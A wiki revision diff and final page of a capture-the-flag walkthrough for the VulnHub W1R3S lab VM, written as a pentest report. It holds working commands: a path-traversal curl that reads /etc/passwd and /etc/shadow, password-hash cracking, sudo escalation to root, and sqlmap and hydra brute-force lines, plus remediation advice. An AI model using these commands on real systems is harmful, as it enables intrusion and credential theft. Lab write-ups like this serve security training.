Difference between revisions of "W1R3S: 1.0.1 ~ VulnHub - CTF Walkthrough"
m (→Enumeration) |
m (→Final Notes) |
||
(6 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
== Objective == | == Objective == | ||
− | + | You have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked you to gain root access and find the flag (located in /root directory). | |
− | Source: [[https://www.vulnhub.com/ | + | Source: [ [https://www.vulnhub.com/entry/w1r3s-101,220/ VulnHub.com] ] |
− | Status: [<span style="color:green">Completed</span>] | + | Status: [ <span style="color:green">Completed</span> ] |
== Methodology == | == Methodology == | ||
Line 12: | Line 12: | ||
</syntaxhighlight> | </syntaxhighlight> | ||
<syntaxhighlight lang=shell-session highlight="" line> | <syntaxhighlight lang=shell-session highlight="" line> | ||
− | root@ | + | root@blaksec:~/Desktop/w1r3s# nmap -O -sT -sV -p- -T5 $TANGO |
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-26 19:01 EDT | Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-26 19:01 EDT | ||
Line 45: | Line 45: | ||
=== Exploitation === | === Exploitation === | ||
− | + | <syntaxhighlight lang=shell-session highlight="4" line> | |
− | + | root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://localhost/administrator/alerts/alertConfigField.php |grep sbin | |
− | + | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
+ | bin:x:2:2:bin:/bin:/usr/sbin/nologin | ||
+ | sys:x:3:3:sys:/dev:/usr/sbin/nologin | ||
+ | ...... | ||
+ | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin | ||
+ | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | ||
+ | sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin | ||
+ | </syntaxhighlight> | ||
+ | And taking it a step further... | ||
+ | <syntaxhighlight lang=shell-session highlight="3,5,7" line> | ||
+ | root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://localhost/administrator/alerts/alertConfigField.php | ||
+ | ... | ||
+ | root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0 | ||
+ | ... | ||
+ | www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7::: | ||
+ | ... | ||
+ | w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:999... | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Didn't take long to crack the hashes with good old trusty '''john''' | ||
+ | |||
+ | |||
<syntaxhighlight lang=shell-session highlight="4,5,6,7" line> | <syntaxhighlight lang=shell-session highlight="4,5,6,7" line> | ||
− | + | root@blaksec:~/Desktop/w1r3s# john --show shadow.txt | |
− | + | w1r3s:computer | |
+ | www-data:www-data | ||
+ | |||
+ | 2 password hashes cracked, 1 left | ||
+ | |||
</syntaxhighlight> | </syntaxhighlight> | ||
− | + | <syntaxhighlight lang=shell-session highlight="23" line> | |
+ | root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# ssh w1r3s@$TANGO | ||
+ | The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established. | ||
+ | ECDSA key fingerprint is SHA256:/3N0PzPMqtXlj9QWJFMbCufh2W95JylZ/oF82NkAAto. | ||
+ | Are you sure you want to continue connecting (yes/no)? yes | ||
+ | Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts. | ||
+ | ---------------------- | ||
+ | Think this is the way? | ||
+ | ---------------------- | ||
+ | Well,........possibly. | ||
+ | ---------------------- | ||
+ | w1r3s@192.168.56.101's password: | ||
+ | Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64) | ||
+ | |||
+ | * Documentation: https://help.ubuntu.com | ||
+ | * Management: https://landscape.canonical.com | ||
+ | * Support: https://ubuntu.com/advantage | ||
+ | |||
+ | 108 packages can be updated. | ||
+ | 6 updates are security updates. | ||
+ | |||
+ | .....You made it huh?.... | ||
+ | Last login: Sun Apr 1 14:38:25 2018 from 192.168.56.200 | ||
+ | w1r3s@W1R3S:~$ | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | <syntaxhighlight lang=shell-session highlight="8" line> | ||
+ | w1r3s@W1R3S:~$ sudo -l | ||
+ | sudo: unable to resolve host W1R3S: Connection refused | ||
+ | [sudo] password for w1r3s: | ||
+ | Matching Defaults entries for w1r3s on W1R3S: | ||
+ | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin | ||
+ | |||
+ | User w1r3s may run the following commands on W1R3S: | ||
+ | (ALL : ALL) ALL | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | <syntaxhighlight lang=shell-session highlight="5" line> | ||
+ | w1r3s@W1R3S:~$ sudo /bin/bash | ||
+ | sudo: unable to resolve host W1R3S: Connection refused | ||
+ | root@W1R3S:~# cd /root | ||
+ | root@W1R3S:/root# ls | ||
+ | flag.txt | ||
+ | root@W1R3S:/root# cat flag.txt | ||
+ | ----------------------------------------------------------------------------------------- | ||
+ | ____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____ | ||
+ | / ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___| | ||
+ | | | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \ | ||
+ | | |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) | | ||
+ | \____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/ | ||
+ | |||
+ | ----------------------------------------------------------------------------------------- | ||
+ | |||
+ | .-----------------TTTT_-----_______ | ||
+ | /''''''''''(______O] ----------____ \______/]_ | ||
+ | __...---'"""\_ --'' Q ___________@ | ||
+ | |''' ._ _______________=---------""""""" | ||
+ | | ..--''| l L |_l | | ||
+ | | ..--'' . /-___j ' ' | ||
+ | | ..--'' / , ' ' | ||
+ | |--'' / ` \ | ||
+ | L__' \ - | ||
+ | - '-. | ||
+ | '. / | ||
+ | '-./ | ||
+ | |||
+ | ---------------------------------------------------------------------------------------- | ||
+ | YOU HAVE COMPLETED THE | ||
+ | __ __ ______________________ _________ | ||
+ | / \ / \/_ \______ \_____ \ / _____/ | ||
+ | \ \/\/ / | || _/ _(__ < \_____ \ | ||
+ | \ / | || | \/ \/ \ | ||
+ | \__/\ / |___||____|_ /______ /_______ /.INC | ||
+ | \/ \/ \/ \/ CHALLENGE, V 1.0 | ||
+ | ---------------------------------------------------------------------------------------- | ||
+ | |||
+ | CREATED BY SpecterWires | ||
+ | |||
+ | ------------------------------------------------------------------------------ | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | == Final Notes == | ||
+ | Lots of decoys! Some things I tried which did not work but might come handy one day: | ||
+ | |||
+ | Using '''nmap''' wordpress scripts | ||
<syntaxhighlight lang=shell-session highlight="" line> | <syntaxhighlight lang=shell-session highlight="" line> | ||
− | + | root@kali:~/Desktop/Bob:1# nmap -sV --script http-wordpress-enum -p 80 --script http-wordpress-users --script-args 'limit=5000,basepath=/wordpress/' 192.168.56.101 | |
− | + | PORT STATE SERVICE VERSION | |
+ | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | ||
+ | |_http-server-header: Apache/2.4.18 (Ubuntu) | ||
+ | | http-wordpress-users: | ||
+ | | Username found: joseph-g | ||
+ | |_Search stopped at ID #5000. Increase the upper limit if necessary with 'http-wordpress-users.limit' | ||
+ | MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC) | ||
+ | |||
+ | root@kali:~/Desktop/Bob:1# nmap -sV --script http-wordpress-enum -p 80 --script-args 'http-wordpress-enum.root=/wordpress,http-wordpress-enum.search-limit=all' 192.168.56.101 | ||
+ | Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-02 08:32 EDT | ||
+ | Nmap scan report for localhost (192.168.56.101) | ||
+ | Host is up (0.00024s latency). | ||
+ | |||
+ | PORT STATE SERVICE VERSION | ||
+ | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | ||
+ | |_http-server-header: Apache/2.4.18 (Ubuntu) | ||
+ | | http-wordpress-enum: | ||
+ | | Search limited to top 50546 themes/plugins | ||
+ | | themes | ||
+ | | twentyfifteen 1.9 | ||
+ | | twentysixteen 1.4 | ||
+ | | twentyseventeen 1.4nmap -O -sT -sV -p- -T5 192.168.56.101 | ||
+ | | plugins | ||
+ | |_ akismet 4.0.2 | ||
+ | MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC) | ||
+ | |||
</syntaxhighlight> | </syntaxhighlight> | ||
+ | Using '''sqlmap''' | ||
+ | <syntaxhighlight lang=shell-session highlight="" line> | ||
+ | sqlmap -u http://localhost/administrator/installation/ --dbms=mysql --data="host=localhost&db=asdf&user=root&password=asdf&table_prefix=cu_&name=Administrator&email=asdf%40mail.com&username=admin&username_password=admin&view=installation_finished" --dump users --level=5 --risk=3 | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Using '''hydra''' to bruteforce WP login | ||
+ | <syntaxhighlight lang=shell-session highlight="" line> | ||
+ | hydra -u -P /usr/share/wordlists/rockyou.txt -a admin 192.168.56.101 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=incorrect' | ||
+ | </syntaxhighlight> | ||
− | |||
− | |||
== Appendix A: Vulnerability Detail and Mitigation == | == Appendix A: Vulnerability Detail and Mitigation == | ||
{| class="wikitable" style="background-color:#cccccc;color:black;font-size:0.9em;width:80%;" | {| class="wikitable" style="background-color:#cccccc;color:black;font-size:0.9em;width:80%;" | ||
− | |+ style="color:#e76700;text-align:left;" | | + | |+ style="color:#e76700;text-align:left;" | Vulnerabilities in un-patched software |
+ | |- | ||
+ | |style="width:120px;" |Rating | ||
+ | |style="color:red;" | High | ||
+ | |- | ||
+ | |Description | ||
+ | |An outdated version of Cuppa CMS was found running on the server, exposed and accessible to the outside network. This version is known for it's Local File Inclusion vulnerability. | ||
+ | |- | ||
+ | |Impact | ||
+ | |An attacker can explore the vulnerability to gain access to various files on the local file system, including but not limited to /etc/passwd, /etc/shadow files, which contain user login information and user passwords. | ||
+ | |- | ||
+ | |Remediation | ||
+ | |Update Cuppa CMS software to the latest stable version. Additionally, set up system permissions in the way that critical system files like /etc/passwd are not accessible to the user used to run webserver processes. | ||
+ | |} | ||
+ | |||
+ | |||
+ | {| class="wikitable" style="background-color:#cccccc;color:black;font-size:0.9em;width:80%;" | ||
+ | |+ style="color:#e76700;text-align:left;" | Weak password policies | ||
|- | |- | ||
|style="width:120px;" |Rating | |style="width:120px;" |Rating | ||
Line 71: | Line 230: | ||
|- | |- | ||
|Description | |Description | ||
− | | | + | |Two user accounts are configured with easy-to-guess dictionary-based passwords. |
+ | |- | ||
+ | |Impact | ||
+ | |An attacker would be able to easily compromise user accounts using dictionary attacks, which will enable them to log in to the host via ssh. | ||
+ | |- | ||
+ | |Remediation | ||
+ | |Implement stronger password policies enforcing proper password complexity, disallowing dictionary based passwords. Perform periodic audit of the passwords using tools like '''cracklib'''. | ||
+ | |} | ||
+ | |||
+ | {| class="wikitable" style="background-color:#cccccc;color:black;font-size:0.9em;width:80%;" | ||
+ | |+ style="color:#e76700;text-align:left;" | All-inclusive sudo role | ||
+ | |- | ||
+ | |style="width:120px;" |Rating | ||
+ | |style="color:yellow;" | Medium | ||
+ | |- | ||
+ | |Description | ||
+ | |Sudo role for user ''w1r3s'' allows for unrestricted access to execute any commands as ''root'' user. | ||
|- | |- | ||
|Impact | |Impact | ||
− | | | + | |After gaining access to ''w13rs'' account, an attacker will be able to escalate their privileges, gaining access to the ''root'' shell. |
|- | |- | ||
|Remediation | |Remediation | ||
− | | | + | |Restrict ''sudo'' roles only to specific command. |
|} | |} |
Latest revision as of 21:32, 20 June 2018
Contents
Objective
You have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked you to gain root access and find the flag (located in /root directory).
Source: [ VulnHub.com ]
Status: [ Completed ]
Methodology
Discovery
root@blaksec:/ # export TANGO=192.168.56.101
root@blaksec:~/Desktop/w1r3s# nmap -O -sT -sV -p- -T5 $TANGO
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-26 19:01 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00093s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Entry Point #1 - Port 80 (HTTP)
Enumeration
A quick scan with dirb came back with two directories wordpress and administrator. The former runs the obvious - Word Press, the latter - CUPPA CMS
WordPress is configured to run under localhost so we need to update /etc/hosts
192.168.56.101 localhost
A quick checked of WordPress with wp-scan did not reveal anything interesting. Gut feel tells me to put that aside and move to CUPPA older versions of which, according to google, come with a LFI vulnerability.
Exploitation
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://localhost/administrator/alerts/alertConfigField.php |grep sbin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
......
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
And taking it a step further...
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://localhost/administrator/alerts/alertConfigField.php
...
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
...
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
...
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:999...
Didn't take long to crack the hashes with good old trusty john
root@blaksec:~/Desktop/w1r3s# john --show shadow.txt
w1r3s:computer
www-data:www-data
2 password hashes cracked, 1 left
root@blaksec:/media/sf_VM_Transfer/Pentesting/w1r3s# ssh w1r3s@$TANGO
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:/3N0PzPMqtXlj9QWJFMbCufh2W95JylZ/oF82NkAAto.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.56.101's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
108 packages can be updated.
6 updates are security updates.
.....You made it huh?....
Last login: Sun Apr 1 14:38:25 2018 from 192.168.56.200
w1r3s@W1R3S:~$
w1r3s@W1R3S:~$ sudo -l
sudo: unable to resolve host W1R3S: Connection refused
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User w1r3s may run the following commands on W1R3S:
(ALL : ALL) ALL
w1r3s@W1R3S:~$ sudo /bin/bash
sudo: unable to resolve host W1R3S: Connection refused
root@W1R3S:~# cd /root
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt
-----------------------------------------------------------------------------------------
____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____
/ ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___|
| | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \
| |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) |
\____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/
-----------------------------------------------------------------------------------------
.-----------------TTTT_-----_______
/''''''''''(______O] ----------____ \______/]_
__...---'"""\_ --'' Q ___________@
|''' ._ _______________=---------"""""""
| ..--''| l L |_l |
| ..--'' . /-___j ' '
| ..--'' / , ' '
|--'' / ` \
L__' \ -
- '-.
'. /
'-./
----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
__ __ ______________________ _________
/ \ / \/_ \______ \_____ \ / _____/
\ \/\/ / | || _/ _(__ < \_____ \
\ / | || | \/ \/ \
\__/\ / |___||____|_ /______ /_______ /.INC
\/ \/ \/ \/ CHALLENGE, V 1.0
----------------------------------------------------------------------------------------
CREATED BY SpecterWires
------------------------------------------------------------------------------
Final Notes
Lots of decoys! Some things I tried which did not work but might come handy one day:
Using nmap wordpress scripts
root@kali:~/Desktop/Bob:1# nmap -sV --script http-wordpress-enum -p 80 --script http-wordpress-users --script-args 'limit=5000,basepath=/wordpress/' 192.168.56.101
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-wordpress-users:
| Username found: joseph-g
|_Search stopped at ID #5000. Increase the upper limit if necessary with 'http-wordpress-users.limit'
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)
root@kali:~/Desktop/Bob:1# nmap -sV --script http-wordpress-enum -p 80 --script-args 'http-wordpress-enum.root=/wordpress,http-wordpress-enum.search-limit=all' 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-02 08:32 EDT
Nmap scan report for localhost (192.168.56.101)
Host is up (0.00024s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-wordpress-enum:
| Search limited to top 50546 themes/plugins
| themes
| twentyfifteen 1.9
| twentysixteen 1.4
| twentyseventeen 1.4nmap -O -sT -sV -p- -T5 192.168.56.101
| plugins
|_ akismet 4.0.2
MAC Address: 08:00:27:CB:EE:8B (Oracle VirtualBox virtual NIC)
Using sqlmap
sqlmap -u http://localhost/administrator/installation/ --dbms=mysql --data="host=localhost&db=asdf&user=root&password=asdf&table_prefix=cu_&name=Administrator&email=asdf%40mail.com&username=admin&username_password=admin&view=installation_finished" --dump users --level=5 --risk=3
Using hydra to bruteforce WP login
hydra -u -P /usr/share/wordlists/rockyou.txt -a admin 192.168.56.101 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=incorrect'
Appendix A: Vulnerability Detail and Mitigation
Rating | High |
Description | An outdated version of Cuppa CMS was found running on the server, exposed and accessible to the outside network. This version is known for it's Local File Inclusion vulnerability. |
Impact | An attacker can explore the vulnerability to gain access to various files on the local file system, including but not limited to /etc/passwd, /etc/shadow files, which contain user login information and user passwords. |
Remediation | Update Cuppa CMS software to the latest stable version. Additionally, set up system permissions in the way that critical system files like /etc/passwd are not accessible to the user used to run webserver processes. |
Rating | High |
Description | Two user accounts are configured with easy-to-guess dictionary-based passwords. |
Impact | An attacker would be able to easily compromise user accounts using dictionary attacks, which will enable them to log in to the host via ssh. |
Remediation | Implement stronger password policies enforcing proper password complexity, disallowing dictionary based passwords. Perform periodic audit of the passwords using tools like cracklib. |
Rating | Medium |
Description | Sudo role for user w1r3s allows for unrestricted access to execute any commands as root user. |
Impact | After gaining access to w13rs account, an attacker will be able to escalate their privileges, gaining access to the root shell. |
Remediation | Restrict sudo roles only to specific command. |